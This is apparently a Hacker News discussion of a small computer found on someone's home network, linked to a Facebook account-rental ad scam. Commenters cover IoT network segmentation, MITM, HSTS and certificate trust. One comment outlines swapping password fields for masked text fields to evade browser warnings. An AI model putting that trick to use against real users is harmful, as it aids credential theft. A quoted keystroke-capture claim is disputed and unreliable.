Out of curiosity, you couldn’t just guess them based on knowing a couple? Or do people assigning them in some fashion that isn’t consecutive within the block?
The board is Nano Pi NEO. It costs $15 and contains quad-core Cortex A7 along with two USB (2.0) ports and 100 Mbit Ethernet. It is about 25% of size of RaspberryPi.
By the way, the same Chinese company now offers a much more powerful board called Nano Pi M4 which is just a bomb with respect to RaspberryPi B+ if you look at its specifications.
This is overblown, isn't it? That thing can't do anything that a public wifi couldn't, and yet everyone connects their laptops to those without hassle. SSL is nearly everywhere now...
If a user wants their free wifi enough they'll be happy to click through those pesky warnings that the root cert is not trusted. They'll probably not think anything of it if it loads as normal, even with a big angry red cross. The speed at which users rip though Windows UAC warnings is astonishing.
https:// with no extra options is still very much prone to downgrade/stripping attacks, and first-time connections to an https:// site are particularly vulnerable since a lot of the extra hardening options (HSTS in particular) can be nullified through TOFU.
I expected click fraud, but if the description is accurate (and I don't have much of a reason to believe it isn't, since it describes pretty shady activity if you read between the lines), they're using the accounts to post shady ads that Facebook doesn't allow (and bans accounts for) until the account gets banned.
Also, the participant is supposed to get paid after they send the Raspberry Pi back after the account got banned, i.e. once the user has absolutely zero value for the scammer... I don't see why the scammer would pay... (although it may be chump change compared to the money they make from getting a percentage of the ad spend, so maybe it's worth paying that to get a better reputation).
It's also three (!) years old, which is crazy to think someone has been mailing these out and running the same scam on FB without getting caught, particularly from 2016 on, with the scrutiny placed on FB's illegitimate political ads
Surely it would be fairly easy for FB to fingerprint the "browser" running on these device and see that it isn't a regular user? At the very least get them to jump through some hoops or enter a CAPTCHA or something?
Ok, so it looks from that like the Pi is there to act as a VPN endpoint of sorts to allow the operators to use the recruit’s Facebook account undetected by FB’s geolocation security. From which it would appear they then run some sort of high-volume affiliate marketing scam.
I think it's the subs moderators that cut off new posts. I think that's something they do quite frequently when something has been identified to a reasonable level.
Yes, this is it. When a post 'blows up' like this and gets linked to from a bunch of outside sources, it creates a big spike in the volume of comments in the moderation queue---i.e., more work for the (unpaid) mod team. If these comments are all tangential to the subreddit's purpose (here, identifying unknown objects), it can be much easier just to lock the thread.
Yeah, I have no idea how it could accomplish what is alleged. Just lots of very bad no good end of world comments. Have none of these people ever used public wifi?
It's clearly not good to have an unknown but presumptively malicious in some way, shape, or form computer on your home network. And I would be cautious about uploading the device's file system and strongly consider changing various passwords. But, yeah, it's not like the computer suddenly has root access to everything else on the network.
This situation is totally totally unlike public wifi!
When I connect to public wifi, the attack surface into my laptop is the external interface of the latest MacOS, with firewall on. Perhaps there are exploits against that, but they're not common. The Mac does have pf, but I'm sure it's a way out of date version! :)
OTOH, "this thing" on the inside of a router/firewall has complete unrestricted access to the LAN. At my house I have (and I just checked) 35 active IPs behind my firewall. It's not hard to get to that number for 4 people: iPhones, TiVos, laptops, desktops, access points, printers, gaming consoles.
I confess I don't secure my LAN computers very well. I have, e.g. 3 letter passwords. That's simply to keep my kids from accidentally going where they shouldn't be.
I'm not alone in my lax security. I do occasionally peruse exit traffic and check firewall logs, which probably puts me somewhere in the most secure 1% of "typical" households.
And even if I were totally paranoid, what can I do about the Internet of shit? Am I supposed to strictly segment everything? At what point does prudence and caution drift into paranoia?
My rule of thumb is: if i have root on the device, it can go behind my private LAN firewall. If I don’t have root, but the device requires Internet, it goes in the guest network which gets throttled and has no access to my LAN. I also scrutinize outbound more on this network. If I don’t have root and it doesn’t need Internet? It stays airgapped.
Decent rules of thumb, though even with root I'd base it more on whether the device really needs general access or not. Speaking of which, a corollary I use is: if an IOT device requires internet access it's automatically bad and I won't even consider it. If they want to offer some built-in but fully optional "access away from home" that wants to use their cloud that's fine, I can just block that anyway and use VPN. If it wants to access one specific address for updates (though you don't have to) or as an optional passive information feed I can see that. But anything IOT that depends on remote resources for its core functionality is right out.
That eliminates a surprising number of IOT devices, but given the flood of crap I think that's no bad thing. These days being able to have something be LAN only with zero service tie-ins seems a decent low pass filter to narrow down choices before diving any deeper.
To be honest, I found that easier than prudence and caution. New access point, stick all my IoT devices on there, then I don't have to particularly worry about what they are doing, they can't access anything interesting anyway (no outbound traffic, inbound traffic is only allowed from one device on my LAN).
A "smart" TV is presumably running content ID on everything that shows up on its screen, a fitness tracker is (of necessity) monitoring your physical activity, ... you get the picture.
I'm not paranoid that someone is tracking me in particular, or even that they would find anything interesting if they did (I'm really pretty boring in the greater scheme of things). Rather, not knowing what is being collected, by who, where it is stored, how long it is retained for, what metadata is attached to it, if their database has been (or is likely to be) breached, etc, means that there's no way for me to confidently assess what my future risks might be. Keep in mind that anonymous data often isn't so anonymous (https://en.wikipedia.org/wiki/De-anonymization).
At this point, something not being an IoT device is a major selling point for me.
> A "smart" TV is presumably running content ID on everything that shows up on its screen
And? There's no outbound traffic, so it can't do anything with it. The only risk is if it caches everything indefinitely and if I happen to connect to another network. I should have added that anything that _needs_ Internet access gets vetted much more closely.
I was also thinking more of home automation like devices, where it does _almost_ eliminate the risk. It can't access my main network, so it can't see any of my traffic, it can't phone home, and I don't have to worry about security vulnerabilities (it's not exposed to the Internet, so you'd probably have to compromise my main device first-at which point I have bigger problems and even if it was compromised it can't initiate any outward connections, blocking, e.g., its use in a botnet).
Whoops, just reread your previous comment and somehow I missed the "no outbound traffic" part. That would indeed seem to largely eliminate the issue, although I wonder how long it will be until devices start communicating with each other wirelessly to exfiltrate cached data. I realize that last sentence sounds paranoid, but nonetheless it would already appear to be well on its way to a home near you. For example (http://www.m-87.com/),
> Our software for the Internet of Things creates a Proximate Internet, intelligently discovering and connecting edge devices when they are in offline environments with poor or non-existent network connectivity. This opens up new edge networking solutions for data trapped in IoT sensors, controllers, or mobile computing devices in challenging environments.
I'm willing to bet your cell phone has a data connection, and while I'm sure yours is running LineageOS or an equivalent, what about that friend you invited over for dinner later?
> although I wonder how long it will be until devices start communicating with each other wirelessly to exfiltrate cached data
At that point I'd have to reconsider. I did wonder about the devices finding a open WiFi point, but at some point you have to draw the line between reasonable precautions and paranoia, and there are none near me (currently) anyway.
>And even if I were totally paranoid, what can I do about the Internet of shit? Am I supposed to strictly segment everything?
Frankly yes, or at least it should be in the back of your mind when you inevitably need to upgrade some gear down the road anyway and thus the marginal cost is lower. People on HN talking about Ubiquiti probably sounds like a broken record at this point and there are certainly other providers and solutions, but you should recognize that solid centralized management and VLAN functionality and the like now has fairly good SoHo options at SoHo pricing too. You don't need to run right out and buy stuff, particularly since 802.11ax looks like it'll be a much more significant general upgrade then anything since the original AC with its focus on more efficient utilization rather then theoreticals.
But when you do, you should be getting something that lets you trivially soft-segment your network at will. At the least shoving IOT, any VoIP, and any cameras onto their own VLANs separate from your main systems is a good idea (not just for security but it can help performance too for VoIP, if you ever use it). At this point particularly with IOT I'd consider that a minimum required feature for any network gear to even be on the list for an upgrade.
>At what point does prudence and caution drift into paranoia?
At the point where hacks aren't trivially automatable for drive by and the difficulty of anything more is higher then the value of getting your stuff. When it comes to IOT though that point is regrettably a long long LONG way off, the security practices in that space are so utterly abysmal even before the typical practice of no updates ever comes in, assuming it's not actively backdoored. And of course this isn't just about you, IOT botnets are a threat to the whole net.
There certainly can be histrionics around this stuff that aren't justified, but I don't think basic segmentation, firewalling, pi-hole, and (if you must have your IOT on the public net though really you should consider using a VPN instead please) strict IP whitelist access or at least rate limits are unreasonable at all. Certainly not for the HN crowd. We can do our parts at least for our own benefit, and maybe[0] even help keep a few coworkers/family/friends/neighbors from contributing their uplinks to DDOSing our stuff too.
0: I genuinely mean "maybe" there, I know very well the payless thankless time sink it can be to take on any sort of IT work after hours. Depends on what family and friends are like. Still, sometimes though fairly low commitment/high return tips are available, or some simple trade of skills, an afternoon helping set up a better network for an afternoon of them helping with something.
Interesting that it is "worth" $15/month. Maybe they were never going to pay up. But if they were, that seems expensive when they could just use compromised PCs and devices for ... whatever they are going to do? Plus they had to buy and supply the dongle.
I wonder what the average time the user will disconnect it after they don't get paid?
It may be worth it to just sacrifice it after a month. I am sure it is profitable, but as people become more aware, it will be harder for them to do this.
It seems like they're fishing for gullible Facebook users on Craigslist. I found an example of a Craigslist posting that tries to "rent" your Facebook profile:
My guess would be either a MITM auth capture, rootkit inject or someone (even a nation state) trying to attribute sources of illicit facebook ads/posts to unsuspecting citizens.
I'd understand why someone would be tempted to install something like this for $1500... Maybe even $150. But $15!? If you're that desperate why not get 3 friends to donate $5 each or something? I'm sure they'd understand if it was truly life-or-death.
a RIPE atlas probe is a small tp-link device that needs a LAN port on your network and USB power. It forms a vpn back to RIPE, and uses traffic outbound via the default gateway it gets via DHCP to reports metrics like uptime, latency to various destinations on the internet, what its external IP is outside your NAT, what ASN it's on, whether your ASN is having reachability issues to the "whole" internet, etc.
many medium and large sized ISPs host RIPE probes at different geographic locations in their networks.
Want to see what's in the initramfs. It almost certainly doesn't have his data on it (it looks to me like it never writes anything to the sdcard, at least not that partition)
> I have a Raspberry Pi right now in my hands fron rentyouraccont.com, i have it running diagnostics on an Air-Gapped pc. This thing is wild. Every second it tries to connect to bot-net programs. It not only buys ads on facebook (which btw i cannot find code that it actually does this) but it is creating links to malware ridden embeds. It is part of a Botnet, i can say for sure. Every second it tries to establish a connection to the botnet, its like a bee thats lost its colony. Register for one and put it on an air-gap, you wills see excatly what im talking about. It records EVERY KEYSTROKE sent of the network, even SSL connection.
so this was a linked comment from a thread 3 years ago....
How is that even possible? How does it capture keystrokes (unless you mean Google searches where each key is sent for autocomplete). How does it break SSL?
Some areas of IT are in guarded rooms, with walls of a certain thickness, filtered power, external RF signals killed, and airgapped except for specific patterns for transfering between external systems.
You probably just want to buy a yubikey and accept a lot of computing is built on a house of cards with respects to trust.
If the site is non-SSL, then there's nothing stopping somebody in control of the network from replacing all "password" fields with plain "text" fields, and then applying a custom font to them so every character entered is displayed as a "•"
That's basically what a password field already is. That would make no difference to anything - the password would be sent over the network in exactly the same way either way.
No. The point of switching out a password field for a text field is to prevent the browser from warning about the existence of a password field on a non-HTTPs secured page. This is a well known, and old trick.
Chrome changes the "Not secure" in the address bar from grey to red (and displays a red explamation mark symbol there) when data is entered into the form.
Which version/OS? I have the latest Chrome (69.0.3497.100) on macOS 10.13.3, and I see no red exclamation mark. Nothing changes or warns me at all when I start entering data in the fields.
It's not enabled by default on the latest Chrome, at least for macOS (10.14). You can enable it using the #enable-mark-http-as flag, after which HTTP pages with password fields will look like this:
The box controls the DNS; majorwebsite.com points to any sever the attacker likes.
The only defense is HSTS/certificate-pinning, for sites previously visited with that browser & device (it’s a TOFU security model).
HN has HSTS, but not Reddit, or my credit union, or my local pizza place, or Kaiser Permanente, etc. etc. etc.
EDIT: I believe e.g. Chrome and Firefox bake in some major certificates, which would also likely flag MITM attacks, for those sites.
EDIT II: Someone responded below (since deleted) that you’d also need that cert to be signed by a CA your browser trusts, which is true. My explanation is faulty/poor. Better informed discussion of attacks further down the thread!
The X.500 series Common Name is a weird thing to fixate on here. It's an arbitrary free text "name". The only reason it's even sometimes useful in the modern era is that the CAB BRs say it has to match one of the SANs so it will probably be a DNS name. But even there good luck, it took until 2016 or so to get the last stragglers to obey that rule properly without "misunderstanding" it and unlike SANs it isn't defined to be DNS A-labels so it may have arbitrary Unicode text.
Most browsers stopped even looking at CN or only do so for people's crappy home grown private CAs
Anyway, what makes certs trustworthy isn't the CN, it's a chain of two or more digital signatures leading to a trusted root. And the CN in that root, while it had to be truthful when written, may be twenty years old, so it's nonsense now.
Leaf certificates have a maximum permitted lifespan of 825 days (down from 36 months)
But I wasn't talking about leaf certificates, I expressly mentioned this for the CN in _root_ certificates and it's pretty common for those to have a lifetime of ten, fifteen even twenty five years.
Here's an easy to remember example, https://crt.sh/?id=1 the first entry in the crt.sh database.
The Common Name on that certificate is "AddTrust External CA Root". So... who are AddTrust? I actually have no idea. This root is today controlled by Comodo, a CA in the United Kingdom but you'd never guess that from the certificate.
> That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.
If you're dumb enough to install one of these boxes on your network, you might also be dumb enough to install an attacker-provided root certificate on your PC.
the sort of people who could be convinced to install one of these things on their network in exchange for a theoretical $15 per month wouldn't be detered by a broken SSL warning.
Eh.. no. It’s going to pickup worthless SSL encrypted TCP packets but not keystrokes.
People need to calm the hell down here. If you’re connecting HTTPS to most of the web, the only thing this thing is going to do is collect worthless packet traffic. Woot woot.
It’s not meant to collect data, it’s meant to act as an agent to a larger network of these things to collectively impact something or another in whatever way. But they could give 2 poops about the traffic on your local network.
I agree, people are really looking into the keylogger theory, but actually I think the goal of the scammer is to have a "legitimate" (residential) internet connection with which to register hundreds of online accounts, or purchase ads, etc. If the IP gets blacklisted by a service (like Facebook), no problem, the account holder will probably notice that they can't get to Facebook anymore, call up the ISP and get a brand new IP address. All this for just $15/month.
[1] https://www.reddit.com/r/whatisthisthing/comments/9ixdh9/fou...
[2] https://pi-hole.net/